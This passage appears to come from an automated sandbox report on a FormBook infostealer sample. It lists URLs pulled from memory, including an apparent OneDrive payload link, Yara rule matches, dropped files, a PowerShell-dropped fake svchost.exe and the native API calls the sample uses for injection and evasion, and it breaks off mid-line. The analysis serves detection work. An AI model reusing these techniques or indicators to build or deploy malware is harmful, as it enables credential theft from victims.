      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officeapps.live.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://onedrive.live.com
      Source: svchost.exe, 00000006.00000002.321211456.0000000000A12000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: svchost.exe, 00000006.00000002.321175230.0000000000A00000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21125&authkey=AI1EUE6
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://settings.outlook.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://tasks.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: svchost.exe, 00000004.00000002.253669190.0000000000800000.00000004.00000001.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match | File source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Detected FormBook malware
      Source: C:\Windows\SysWOW64\svchost.exe | Dropped file: C:\Users\user\AppData\Roaming\O38QPC87\O38logri.ini
      Source: C:\Windows\SysWOW64\svchost.exe | Dropped file: C:\Users\user\AppData\Roaming\O38QPC87\O38logrv.ini
      Malicious sample detected (through community Yara rule)
      Source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.482604625.0000000003A2F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
      Source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F9854 NtProtectVirtualMemory,4_2_023F9854
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F3690 NtWriteVirtualMemory,4_2_023F3690
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F3E8B NtWriteVirtualMemory,4_2_023F3E8B
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F376C NtWriteVirtualMemory,4_2_023F376C
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F0762 NtSetInformationThread,TerminateProcess,4_2_023F0762
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F075D NtSetInformationThread,TerminateProcess,4_2_023F075D
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F3BDC NtWriteVirtualMemory,4_2_023F3BDC
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F881E NtSetInformationThread,TerminateProcess,4_2_023F881E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F887E NtSetInformationThread,TerminateProcess,4_2_023F887E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F906A NtWriteVirtualMemory,4_2_023F906A
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F8454 NtSetInformationThread,TerminateProcess,4_2_023F8454
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F84B9 NtSetInformationThread,TerminateProcess,4_2_023F84B9
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F80B1 NtSetInformationThread,TerminateProcess,4_2_023F80B1
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F791B NtSetInformationThread,TerminateProcess,4_2_023F791B
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 4_2_023F8505 NtSetInformationThread,TerminateProcess,4_2_023F8505
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC696E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_1EC696E0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69A50 NtCreateFile,LdrInitializeThunk,6_2_1EC69A50
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_1EC69660
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_1EC69A00
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69A20 NtResumeThread,LdrInitializeThunk,6_2_1EC69A20
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69780 NtMapViewOfSection,LdrInitializeThunk,6_2_1EC69780
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC697A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_1EC697A0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69710 NtQueryInformationToken,LdrInitializeThunk,6_2_1EC69710
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC698F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_1EC698F0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69840 NtDelayExecution,LdrInitializeThunk,6_2_1EC69840
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69860 NtQuerySystemInformation,LdrInitializeThunk,6_2_1EC69860
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC695D0 NtClose,LdrInitializeThunk,6_2_1EC695D0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC699A0 NtCreateSection,LdrInitializeThunk,6_2_1EC699A0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69540 NtReadFile,LdrInitializeThunk,6_2_1EC69540
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_1EC69910
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC696D0 NtCreateKey,6_2_1EC696D0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69A80 NtOpenDirectoryObject,6_2_1EC69A80
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69650 NtQueryValueKey,6_2_1EC69650
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69670 NtQueryInformationProcess,6_2_1EC69670
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69610 NtEnumerateValueKey,6_2_1EC69610
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69A10 NtQuerySection,6_2_1EC69A10
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69FE0 NtCreateMutant,6_2_1EC69FE0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC6A3B0 NtGetContextThread,6_2_1EC6A3B0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69760 NtOpenProcess,6_2_1EC69760
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69770 NtSetInformationFile,6_2_1EC69770
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC6A770 NtOpenThread,6_2_1EC6A770
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69B00 NtSetValueKey,6_2_1EC69B00
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC6A710 NtOpenProcessToken,6_2_1EC6A710
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69730 NtQueryVirtualMemory,6_2_1EC69730
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC698A0 NtWriteVirtualMemory,6_2_1EC698A0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC6B040 NtSuspendThread,6_2_1EC6B040
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69820 NtEnumerateKey,6_2_1EC69820
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC699D0 NtCreateProcessEx,6_2_1EC699D0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC695F0 NtQueryInformationFile,6_2_1EC695F0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69950 NtQueueApcThread,6_2_1EC69950
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69560 NtWriteFile,6_2_1EC69560
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC69520 NtWaitForSingleObject,6_2_1EC69520
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_1EC6AD30 NtSetContextThread,6_2_1EC6AD30
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00569854 NtProtectVirtualMemory,6_2_00569854
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_0056791B NtSetInformationThread,NtProtectVirtualMemory,6_2_0056791B
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_005631F6 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,6_2_005631F6
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_005631B2 CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,6_2_005631B2
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00569EFE NtQueryInformationProcess,6_2_00569EFE
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00562E9E Sleep,TerminateThread,Sleep,NtProtectVirtualMemory,6_2_00562E9E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00560720 EnumWindows,NtSetInformationThread,6_2_00560720
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00568454 NtSetInformationThread,6_2_00568454
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_0056887E NtSetInformationThread,6_2_0056887E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_0056881E NtSetInformationThread,6_2_0056881E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_005680B1 NtSetInformationThread,6_2_005680B1
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_005684B9 NtSetInformationThread,6_2_005684B9
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_0056A17E NtQueryInformationProcess,6_2_0056A17E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00568505 NtSetInformationThread,6_2_00568505
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00563298 NtProtectVirtualMemory,6_2_00563298
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_0056075D NtSetInformationThread,6_2_0056075D
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00560762 NtSetInformationThread,6_2_00560762
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_00569F0C NtQueryInformationProcess,6_2_00569F0C
      Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 6_2_005643B4 LdrInitializeThunk,NtProtectVirtualMemory,6_2_005643B4
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_005643A2 LdrInitializeThunk,NtProtectVirtualMemory,6_2_005643A2
      Source: C:\Windows\explorer.exeCode function: 11_2_05889852 NtCreateFile,NtReadFile,NtClose,11_2_05889852
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569770 NtSetInformationFile,LdrInitializeThunk,16_2_03569770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569710 NtQueryInformationToken,LdrInitializeThunk,16_2_03569710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569B00 NtSetValueKey,LdrInitializeThunk,16_2_03569B00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569FE0 NtCreateMutant,LdrInitializeThunk,16_2_03569FE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569780 NtMapViewOfSection,LdrInitializeThunk,16_2_03569780
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569650 NtQueryValueKey,LdrInitializeThunk,16_2_03569650
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569A50 NtCreateFile,LdrInitializeThunk,16_2_03569A50
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_03569660
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569610 NtEnumerateValueKey,LdrInitializeThunk,16_2_03569610
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035696D0 NtCreateKey,LdrInitializeThunk,16_2_035696D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035696E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_035696E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569540 NtReadFile,LdrInitializeThunk,16_2_03569540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569560 NtWriteFile,LdrInitializeThunk,16_2_03569560
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_03569910
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035695D0 NtClose,LdrInitializeThunk,16_2_035695D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035699A0 NtCreateSection,LdrInitializeThunk,16_2_035699A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569840 NtDelayExecution,LdrInitializeThunk,16_2_03569840
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569860 NtQuerySystemInformation,LdrInitializeThunk,16_2_03569860
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0356A770 NtOpenThread,16_2_0356A770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569760 NtOpenProcess,16_2_035697